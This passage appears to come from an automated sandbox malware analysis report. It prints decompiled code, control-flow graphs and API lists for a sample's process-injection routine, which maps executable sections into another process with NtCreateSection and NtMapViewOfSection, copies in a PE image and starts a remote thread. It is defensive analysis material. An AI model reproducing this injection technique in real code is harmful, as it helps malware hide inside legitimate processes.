                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 61270f2820b76154097c11168e410355082364bb205f1f9274eadb9914c2945a
                                                              • Instruction ID: d7a87560e4518483a9a905c0811b8b4d92cc7fa9c4f71bddd110749a196bc2cc
                                                              • Opcode Fuzzy Hash: 61270f2820b76154097c11168e410355082364bb205f1f9274eadb9914c2945a
                                                              • Instruction Fuzzy Hash: 2E615F71900204FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA2E5D6749A41CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014DB Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 127 4014db-401519 call 4011bb 134 40151b 127->134 135 40151e-401523 127->135 134->135 137 401845-40184d 135->137 138 401529-40153a 135->138 137->135 141 401540-401569 138->141 142 401843-401852 138->142 141->142 150 40156f-401586 NtDuplicateObject 141->150 144 401868 142->144 145 401859-401864 142->145 144->145 147 40186b-40188d call 4011bb 144->147 145->147 150->142 152 40158c-4015b0 NtCreateSection 150->152 155 4015b2-4015d3 NtMapViewOfSection 152->155 156 40160c-401632 NtCreateSection 152->156 155->156 158 4015d5-4015f1 NtMapViewOfSection 155->158 156->142 159 401638-40163c 156->159 158->156 160 4015f3-401609 158->160 159->142 161 401642-401663 NtMapViewOfSection 159->161 160->156 161->142 162 401669-401685 NtMapViewOfSection 161->162 162->142 164 40168b call 401690 162->164 164->142
                                                              C-Code - Quality: 62%
                                                              			E004014DB(void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t84;
				intOrPtr _t87;
				intOrPtr _t90;
				void* _t93;
				signed int _t94;
				struct _GUID _t101;
				struct _GUID _t103;
				PVOID* _t105;
				PVOID* _t107;
				signed int _t109;
				intOrPtr* _t111;
				PVOID* _t124;
				PVOID* _t126;
				intOrPtr _t131;
				void* _t133;
				signed int _t134;
				void** _t135;
				signed int _t142;
				int _t143;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				void* _t165;
				intOrPtr* _t166;
				long _t175;
				intOrPtr _t177;
				void* _t178;
				HANDLE* _t184;
				HANDLE* _t186;
				void* _t191;
				intOrPtr* _t194;
				void* _t197;
				void* _t198;
				intOrPtr* _t200;
				signed int* _t201;
				signed int* _t202;
				signed int* _t205;
				signed int* _t206;
				void* _t207;
				long _t221;

				_t226 = __fp0;
				_t159 = __edx;
				_t207 = _t84 + 1;
				_push(0x150b);
				_t87 =  *_t200;
				_t201 = _t200 + 4;
				_t133 = 0x37e;
				E004011BB(_t87, _t133, __edx, __edi, __esi, _t207, __fp0);
				_t131 =  *((intOrPtr*)(_t198 + 8));
				_t175 = 0;
				 *((intOrPtr*)(_t198 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
				}
				while(1) {
					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t90 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t198 - 0x5c)) = _t90;
				_t184 = _t198 - 0x60;
				 *_t184 = _t175;
				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t184);
				_t93 =  *_t184;
				if(_t93 != 0) {
					_t135 = _t198 - 0x30;
					 *_t135 = _t93;
					_t135[1] = _t175;
					_t184 = _t198 - 0x28;
					 *((intOrPtr*)(_t131 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_t159 = _t184;
					_push(_t198 - 0x30);
					_push(_t184);
					_push(0x40);
					_push(_t198 - 0x10);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t175, _t175, 2) == 0) {
						 *(_t198 - 8) = _t175;
						_t101 = _t198 - 0x50;
						 *(_t101 + 4) = _t175;
						 *_t101 = 0x5000;
						_t186 = _t198 - 0x54;
						if(NtCreateSection(_t186, 6, _t175, _t101, 4, 0x8000000, _t175) == 0) {
							 *_t25 =  *(_t198 - 0x50);
							_t124 = _t198 - 0x44;
							 *_t124 = _t175;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t124, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 4) == 0) {
								_t126 = _t198 - 0x3c;
								 *_t126 = _t175;
								if(NtMapViewOfSection( *_t186,  *(_t198 - 0xc), _t126, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 4) == 0) {
									_t197 =  *(_t198 - 0x44);
									 *((intOrPtr*)(_t131 + 0x20))(_t175, _t197, 0x104);
									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
									 *(_t198 - 8) =  *(_t198 - 8) + 1;
								}
							}
						}
						_t103 = _t198 - 0x50;
						 *(_t103 + 4) = _t175;
						 *_t103 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
						_t184 = _t198 - 0x58;
						if(NtCreateSection(_t184, 0xe, _t175, _t103, 0x40, 0x8000000, _t175) == 0 &&  *(_t198 - 8) != 0) {
							 *_t46 =  *(_t198 - 0x50);
							_t105 = _t198 - 0x48;
							 *_t105 = _t175;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t105, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 4) == 0) {
								_t107 = _t198 - 0x40;
								 *_t107 = _t175;
								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t107, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 0x20);
								if(_t221 == 0) {
									L20();
									if(_t221 == 0 && _t221 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t160 =  *_t201;
									_t205 =  &(_t201[1]);
									_push(_t160);
									_t109 =  *_t205;
									_t206 =  &(_t205[1]);
									_t161 = _t160 << 5;
									_t162 = _t161 + _t109;
									asm("lodsb");
									_t163 = _t162;
									asm("loop 0xffffffc3");
									_t164 = _t163 ^ 0xc66a5524;
									_t201 = _t206 - _t164;
									_t191 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
									_t142 =  *(_t191 + 6) & 0x0000ffff;
									_push(_t191);
									_t165 = _t191;
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_t166 = _t165 + 0xf8;
										__eflags = _t166;
									} else {
										_t166 = _t165 + 0x108;
									}
									_push(_t142);
									_t143 =  *(_t166 + 0x10);
									if(_t143 != 0) {
										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t143);
										_t201 =  &(_t201[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t184);
									_t225 =  *((intOrPtr*)(_t198 - 0x34));
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_push(_t184);
										_t159 = _t184[0xd] -  *(_t198 - 0x40);
										_t194 = _t184[0x28] +  *(_t198 - 0x48);
										__eflags = _t194;
										while(1) {
											__eflags =  *_t194;
											if( *_t194 == 0) {
												break;
											}
											_t177 =  *_t194;
											_t194 = _t194 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t159;
												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t177));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t184);
										_t175 = 0;
										__eflags = 0;
										_t111 = _t198 - 4;
										 *_t111 = 0;
										 *((intOrPtr*)(_t131 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0, _t184[0xa] +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t111, 0);
									} else {
										L53();
										_pop(_t178);
										_t175 = _t178 - 0x1781;
										 *((intOrPtr*)(_t175 + 0x17b5)) = _t175 + 0x2c1d;
										E00401256(_t131, _t175 + 0x17b5, _t175, _t184, _t225, _t175 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t175 + 0x17da)) = _t175 + 0x2c6d;
										_t159 =  *(_t198 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t94 =  *_t201;
				_t202 =  &(_t201[1]);
				_push(0x37e);
				_t134 =  *_t202;
				return E004011BB(_t94, _t134, _t159, _t175, _t184, _t225, _t226);
			}













































                                                              0x004014db
                                                              0x004014db
                                                              0x004014dc
                                                              0x004014df
                                                              0x004014e4
                                                              0x004014e7
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 9918b791cbb1f0ff44df8d0300a116fe7034d9304c3fa806413ff11951633f60
                                                              • Instruction ID: 3d44a7bbcb2d413b89cc6d66608d23a65ef9d07510e7ee37a771aa04e1e65fe6
                                                              • Opcode Fuzzy Hash: 9918b791cbb1f0ff44df8d0300a116fe7034d9304c3fa806413ff11951633f60
                                                              • Instruction Fuzzy Hash: FE5129B5900255BFEB219F91CC48FAFBBB8FF85B00F104159F911AA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014ED Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 166 4014ed-401519 call 4011bb 175 40151b 166->175 176 40151e-401523 166->176 175->176 178 401845-40184d 176->178 179 401529-40153a 176->179 178->176 182 401540-401569 179->182 183 401843-401852 179->183 182->183 191 40156f-401586 NtDuplicateObject 182->191 185 401868 183->185 186 401859-401864 183->186 185->186 188 40186b-40188d call 4011bb 185->188 186->188 191->183 193 40158c-4015b0 NtCreateSection 191->193 196 4015b2-4015d3 NtMapViewOfSection 193->196 197 40160c-401632 NtCreateSection 193->197 196->197 199 4015d5-4015f1 NtMapViewOfSection 196->199 197->183 200 401638-40163c 197->200 199->197 201 4015f3-401609 199->201 200->183 202 401642-401663 NtMapViewOfSection 200->202 201->197 202->183 203 401669-401685 NtMapViewOfSection 202->203 203->183 205 40168b call 401690 203->205 205->183
                                                              C-Code - Quality: 62%
                                                              			E004014ED(void* __eax, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t87;
				intOrPtr _t90;
				void* _t93;
				signed int _t94;
				struct _GUID _t101;
				struct _GUID _t103;
				PVOID* _t105;
				PVOID* _t107;
				signed int _t109;
				intOrPtr* _t111;
				PVOID* _t124;
				PVOID* _t126;
				intOrPtr _t130;
				void* _t134;
				signed int _t135;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				long _t176;
				intOrPtr _t178;
				void* _t179;
				HANDLE* _t185;
				HANDLE* _t187;
				void* _t192;
				intOrPtr* _t195;
				void* _t198;
				void* _t199;
				intOrPtr* _t201;
				signed int* _t202;
				signed int* _t203;
				signed int* _t206;
				signed int* _t207;
				long _t222;

				_t227 = __fp0;
				_t160 = __edx;
				_push(0x150b);
				_t87 =  *_t201;
				_t202 = _t201 + 4;
				_t134 = 0x37e;
				E004011BB(_t87, _t134, __edx, __edi, __esi, __eflags, __fp0);
				_t130 =  *((intOrPtr*)(_t199 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t199 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t199 - 0x34)) =  *((intOrPtr*)(_t199 - 0x34)) + 1;
				}
				while(1) {
					_t90 =  *((intOrPtr*)(_t130 + 0x48))();
					if(_t90 != 0) {
						break;
					}
					 *((intOrPtr*)(_t130 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t199 - 0x5c)) = _t90;
				_t185 = _t199 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t130 + 0x4c))(_t90, _t185);
				_t93 =  *_t185;
				if(_t93 != 0) {
					_t136 = _t199 - 0x30;
					 *_t136 = _t93;
					_t136[1] = _t176;
					_t185 = _t199 - 0x28;
					 *((intOrPtr*)(_t130 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_t160 = _t185;
					_push(_t199 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t199 - 0x10);
					if( *((intOrPtr*)(_t130 + 0x70))() == 0 && NtDuplicateObject( *(_t199 - 0x10), 0xffffffff, 0xffffffff, _t199 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t199 - 8) = _t176;
						_t101 = _t199 - 0x50;
						 *(_t101 + 4) = _t176;
						 *_t101 = 0x5000;
						_t187 = _t199 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t101, 4, 0x8000000, _t176) == 0) {
							 *_t26 =  *(_t199 - 0x50);
							_t124 = _t199 - 0x44;
							 *_t124 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t124, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 4) == 0) {
								_t126 = _t199 - 0x3c;
								 *_t126 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t199 - 0xc), _t126, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 4) == 0) {
									_t198 =  *(_t199 - 0x44);
									 *((intOrPtr*)(_t130 + 0x20))(_t176, _t198, 0x104);
									 *((intOrPtr*)(_t198 + 0x208)) =  *((intOrPtr*)(_t199 + 0x14));
									 *(_t199 - 8) =  *(_t199 - 8) + 1;
								}
							}
						}
						_t103 = _t199 - 0x50;
						 *(_t103 + 4) = _t176;
						 *_t103 =  *((intOrPtr*)(_t199 + 0x10)) + 0x10000;
						_t185 = _t199 - 0x58;
						if(NtCreateSection(_t185, 0xe, _t176, _t103, 0x40, 0x8000000, _t176) == 0 &&  *(_t199 - 8) != 0) {
							 *_t47 =  *(_t199 - 0x50);
							_t105 = _t199 - 0x48;
							 *_t105 = _t176;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t105, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 4) == 0) {
								_t107 = _t199 - 0x40;
								 *_t107 = _t176;
								_t222 = NtMapViewOfSection( *_t185,  *(_t199 - 0xc), _t107, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 0x20);
								if(_t222 == 0) {
									L21();
									if(_t222 == 0 && _t222 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t161 =  *_t202;
									_t206 =  &(_t202[1]);
									_push(_t161);
									_t109 =  *_t206;
									_t207 =  &(_t206[1]);
									_t162 = _t161 << 5;
									_t163 = _t162 + _t109;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc3");
									_t165 = _t164 ^ 0xc66a5524;
									_t202 = _t207 - _t165;
									_t192 =  *((intOrPtr*)(_t199 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0xc))));
									_t143 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t166 = _t192;
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t199 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t199 + 0xc)), _t144);
										_t202 =  &(_t202[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t185);
									_t226 =  *((intOrPtr*)(_t199 - 0x34));
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_push(_t185);
										_t160 = _t185[0xd] -  *(_t199 - 0x40);
										_t195 = _t185[0x28] +  *(_t199 - 0x48);
										__eflags = _t195;
										while(1) {
											__eflags =  *_t195;
											if( *_t195 == 0) {
												break;
											}
											_t178 =  *_t195;
											_t195 = _t195 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t160;
												__eflags =  *((intOrPtr*)(0 +  *(_t199 - 0x48) + _t178));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t185);
										_t176 = 0;
										__eflags = 0;
										_t111 = _t199 - 4;
										 *_t111 = 0;
										 *((intOrPtr*)(_t130 + 0x98))( *(_t199 - 0xc), 0, 0, 0, 0, 0, _t185[0xa] +  *(_t199 - 0x40),  *(_t199 - 0x3c), _t111, 0);
									} else {
										L54();
										_pop(_t179);
										_t176 = _t179 - 0x1781;
										 *((intOrPtr*)(_t176 + 0x17b5)) = _t176 + 0x2c1d;
										E00401256(_t130, _t176 + 0x17b5, _t176, _t185, _t226, _t176 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t176 + 0x17da)) = _t176 + 0x2c6d;
										_t160 =  *(_t199 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t94 =  *_t202;
				_t203 =  &(_t202[1]);
				_push(0x37e);
				_t135 =  *_t203;
				return E004011BB(_t94, _t135, _t160, _t176, _t185, _t226, _t227);
			}











































                                                              0x004014ed
                                                              0x004014ed
                                                              0x004014df
                                                              0x004014e4
                                                              0x004014e7
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: f7fdfd08fcb8eed158454bdf17d9c406f3432810bc7538c0baa4c61a2813e87b
                                                              • Instruction ID: 56051b854cc78bb7cf401cc86fa9e38e91d39254f0b1df9b0b50e8092bc8a5cc
                                                              • Opcode Fuzzy Hash: f7fdfd08fcb8eed158454bdf17d9c406f3432810bc7538c0baa4c61a2813e87b
                                                              • Instruction Fuzzy Hash: 985119B5900255BFEB219F91CC48FAB7BB8FF85B00F104169F911AA2E5D6749A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014F0 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 207 4014f0-401519 call 4011bb 214 40151b 207->214 215 40151e-401523 207->215 214->215 217 401845-40184d 215->217 218 401529-40153a 215->218 217->215 221 401540-401569 218->221 222 401843-401852 218->222 221->222 230 40156f-401586 NtDuplicateObject 221->230 224 401868 222->224 225 401859-401864 222->225 224->225 227 40186b-40188d call 4011bb 224->227 225->227 230->222 232 40158c-4015b0 NtCreateSection 230->232 235 4015b2-4015d3 NtMapViewOfSection 232->235 236 40160c-401632 NtCreateSection 232->236 235->236 238 4015d5-4015f1 NtMapViewOfSection 235->238 236->222 239 401638-40163c 236->239 238->236 240 4015f3-401609 238->240 239->222 241 401642-401663 NtMapViewOfSection 239->241 240->236 241->222 242 401669-401685 NtMapViewOfSection 241->242 242->222 244 40168b call 401690 242->244 244->222
                                                              C-Code - Quality: 61%
                                                              			E004014F0(void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t84;
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t129;
				signed int _t130;
				void** _t131;
				signed int _t138;
				int _t139;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t161;
				intOrPtr* _t162;
				long _t171;
				intOrPtr _t173;
				void* _t174;
				HANDLE* _t180;
				HANDLE* _t182;
				void* _t187;
				intOrPtr* _t190;
				void* _t193;
				void* _t194;
				signed int* _t196;
				signed int* _t197;
				signed int* _t200;
				signed int* _t201;
				long _t216;

				_t221 = __fp0;
				_t155 = __edx;
				asm("out dx, eax");
				_t129 = 0x37e;
				E004011BB(_t84, _t129, __edx, __edi, __esi, __eflags, __fp0);
				_t127 =  *((intOrPtr*)(_t194 + 8));
				_t171 = 0;
				 *((intOrPtr*)(_t194 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t194 - 0x34)) =  *((intOrPtr*)(_t194 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t194 - 0x5c)) = _t87;
				_t180 = _t194 - 0x60;
				 *_t180 = _t171;
